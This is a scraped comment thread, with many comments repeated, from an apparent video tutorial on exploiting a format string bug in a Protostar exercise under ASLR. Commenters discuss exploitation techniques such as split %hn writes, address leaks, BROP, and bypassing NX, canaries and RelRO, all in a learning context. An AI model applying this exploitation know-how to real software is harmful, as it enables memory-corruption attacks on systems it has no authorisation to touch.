I love this modern "refresh" series with the programs from protostar being compiled and exploited on modern systems! Thank you for this amazing video once again! :)
You dont really know how many headaches i got trying to exploit on Windows 10 64 Bits with Assembly AMD64 lmaooooooo, ASLR, NX ant stuff that kicked me in the face xD
@@selimeneskaraduman6935 exactly men, i recently discovered RelRO and i was kinda sad :( One more level in the game :( Thanks for your comment! How are you going on this topic? Are you advancing?
@@marcovalentinoalvarado3290 There are even more kinda stuff (e.g for windows kernel CFG SMAP) but nowadays still even high end products are being exploited; browsers, virtualizations, and kernels. The important point is to gain arbitrary READ/WRITE primitive in the memory. If you read some blogs about these exploits you will see READ/WRITE primitive because this allows us to bypass mitigations and create attacks for target specific
Hi, just to let you know, there's a trick to write 0xdeadbeef to target. You can write several 2-byte packs of data to finally write 0xdeadbeef. For that you need the original adress and the same adress with an offset of two in the beginning of your string. If the second 2 byte value is less than the first one you can cound to 0x1dead instead of 0xdead (in case of deadbeef this is not necessary but if you're in need of doing so...) and overwrite one half byte of the next data word.
Not the amount of output characters shifts the stack around but the amount of input characters. Of course you need to get the padding right to hit the two adresses to write to. But as the second adress is a known amount of bytes after the first one, you can easily write to the second one as well. It's basically the same as in the video but with two writes and two adresses.
I got to the point at 9:40 where my target addr will be 1 nibble off from the address I partially overwrite. Example: Target addr = 7fff659c8c4c Overwritten addr = 7fff659c8d4c It is always the digit right before 4c and it is always 1 hex digit greater. It never matches. Why would this be?
Amazing video. But your editing skills have greatlyyyyy upgraded. Videos feel fuckin smooth. Great job mahn. And amazing Hacking skills you got there. :D
Thanks for the tutorial. Somehow modern iteration (x64, libc-2.29) compiles with $rax which lays after the string and technique explained in the very beginning works
I don't think ALSR is the problem here. I mean I'm a noob, but if you want to write 0xdeadbeef by using %n you would have to have written 3735928559 characters (3.7 GB!!) into buffer. the stack segment on my machine is 0x21000 bytes long (~ 135kB). You'd run into a segfault before you even get to 1 MB written to buffer.
Why "eventualy" you could get the correct address? I woudl guess that value on the stack is address of some other variable, each execution it would be diferent, but offset would be the same. So it would shift back and forth as the target is... Why are we able to hit it just updating the last nibble and not other bytes?
How would you utilize the leaked value in an input string? Can you maintain an open input stream to the program whilst executing the program? Can you by chance hook it to something with input stream and have it get stored in the stack?
Sorry for my delayed response (UA-cam didn't notify me). Vagrant actually starts pretty fast, in about 1 minute, at least in my Late 2015 iMac with an i5.
Hey, ich hab gerade ein interesantes Video über ASLR bypass gefunden, in der Technik umgehen sie die ASLR indem sie nach einer verzögerung in der CPU-Cache suchen und somit die Map der MMU finde..besser und detaillierter beschrieben ist es im Video, ich hoffe es hilft weiter. ua-cam.com/video/c8aRHLhQGBc/v-deo.html
I love this modern "refresh" series with the programs from protostar being compiled and exploited on modern systems! Thank you for this amazing video once again! :)
You dont really know how many headaches i got trying to exploit on Windows 10 64 Bits with Assembly AMD64 lmaooooooo, ASLR, NX ant stuff that kicked me in the face xD
@@marcovalentinoalvarado3290 ASLR and NX have friends named Stack Canary,PIE,RelRO. They don't like you too :D
@@selimeneskaraduman6935 exactly men, i recently discovered RelRO and i was kinda sad :( One more level in the game :( Thanks for your comment! How are you going on this topic? Are you advancing?
@@marcovalentinoalvarado3290 There are even more kinda stuff (e.g for windows kernel CFG SMAP) but nowadays still even high end products are being exploited;
browsers, virtualizations, and kernels.
The important point is to gain arbitrary READ/WRITE primitive in the memory. If you read some blogs about these exploits you will see READ/WRITE primitive because this allows us to bypass mitigations and create attacks for target specific
@@selimeneskaraduman6935 Is there any way i can contact you in order to ask you for some blogs to read? :D
6:18 I'm glad you said "if this were an application which took longer to start or a remote service, then you couldn't do it"
Hi, just to let you know, there's a trick to write 0xdeadbeef to target. You can write several 2-byte packs of data to finally write 0xdeadbeef. For that you need the original adress and the same adress with an offset of two in the beginning of your string. If the second 2 byte value is less than the first one you can cound to 0x1dead instead of 0xdead (in case of deadbeef this is not necessary but if you're in need of doing so...) and overwrite one half byte of the next data word.
But that would take even longer time for the "magical" match to happen right?
Not the amount of output characters shifts the stack around but the amount of input characters. Of course you need to get the padding right to hit the two adresses to write to. But as the second adress is a known amount of bytes after the first one, you can easily write to the second one as well. It's basically the same as in the video but with two writes and two adresses.
@@antricks2546 Ohhhh i see that's definitely intresting
Yes this trick was also explained in a book "Hacking : The art of Exploitation"
@@HackingIsDope Actually, that's where I've got it from ^^
I got to the point at 9:40 where my target addr will be 1 nibble off from the address I partially overwrite.
Example:
Target addr = 7fff659c8c4c
Overwritten addr = 7fff659c8d4c
It is always the digit right before 4c and it is always 1 hex digit greater. It never matches.
Why would this be?
Amazing video. But your editing skills have greatlyyyyy upgraded. Videos feel fuckin smooth. Great job mahn. And amazing Hacking skills you got there. :D
Thanks for the tutorial. Somehow modern iteration (x64, libc-2.29) compiles with $rax which lays after the string and technique explained in the very beginning works
I don't think ALSR is the problem here. I mean I'm a noob, but if you want to write 0xdeadbeef by using %n you would have to have written 3735928559 characters (3.7 GB!!) into buffer. the stack segment on my machine is 0x21000 bytes long (~ 135kB). You'd run into a segfault before you even get to 1 MB written to buffer.
you can also use multiple %n that overlap eachother (I have done that in some video too). You could also write only one or two bytes with %hn etc.
Did you hear about how all windows versions from 8 till now haven't been applying ASLR properly?
what do you mean?
Apparently they fail to generate enough entropy and end up with the same base addresses each time. there was an article on bleepingcomputer about it
Alexander Anderson could you share the link to that article here?
Sure www.bleepingcomputer.com/news/security/windows-8-and-later-fail-to-properly-apply-aslr-heres-how-to-fix/
I couldn't believe it so i found another source, and yep, it's true.
www.kb.cert.org/vuls/id/817544
Why "eventualy" you could get the correct address? I woudl guess that value on the stack is address of some other variable, each execution it would be diferent, but offset would be the same. So it would shift back and forth as the target is... Why are we able to hit it just updating the last nibble and not other bytes?
try override &target with 0xde and &target+1 with 0xad and so on... so that you don't have to print billions of char before %n
sprintf will add a null byte at the end of the string..
Thanks for the amazing video, i was also trying to do this on aslr.. But still cant able to exploit.
Amazing video!
I think you could also use brop to stack read if your program didn't rerandomize
Good video as always
I wonder if shifting bits to left or right would do anything
I think you could also use the format string to leak the address of target
How would you utilize the leaked value in an input string? Can you maintain an open input stream to the program whilst executing the program? Can you by chance hook it to something with input stream and have it get stored in the stack?
255 likes :) coincidence ? i dont think so :D
Why do you rent a server which costs you money instead of using something like Vagrant? You could even use an Orange/Raspberry Pi if you wanted.
+GRBTutorials laziness. Starting a VM takes longer than renting it for a minute :P
Sorry for my delayed response (UA-cam didn't notify me). Vagrant actually starts pretty fast, in about 1 minute, at least in my Late 2015 iMac with an i5.
Hey, ich hab gerade ein interesantes Video über ASLR bypass gefunden, in der Technik umgehen sie die ASLR indem sie nach einer verzögerung in der CPU-Cache suchen und somit die Map der MMU finde..besser und detaillierter beschrieben ist es im Video, ich hoffe es hilft weiter.
ua-cam.com/video/c8aRHLhQGBc/v-deo.html
please make a video on how to hack car remote please
i didn't understand a shit . aslr is crape in CTFs/challenges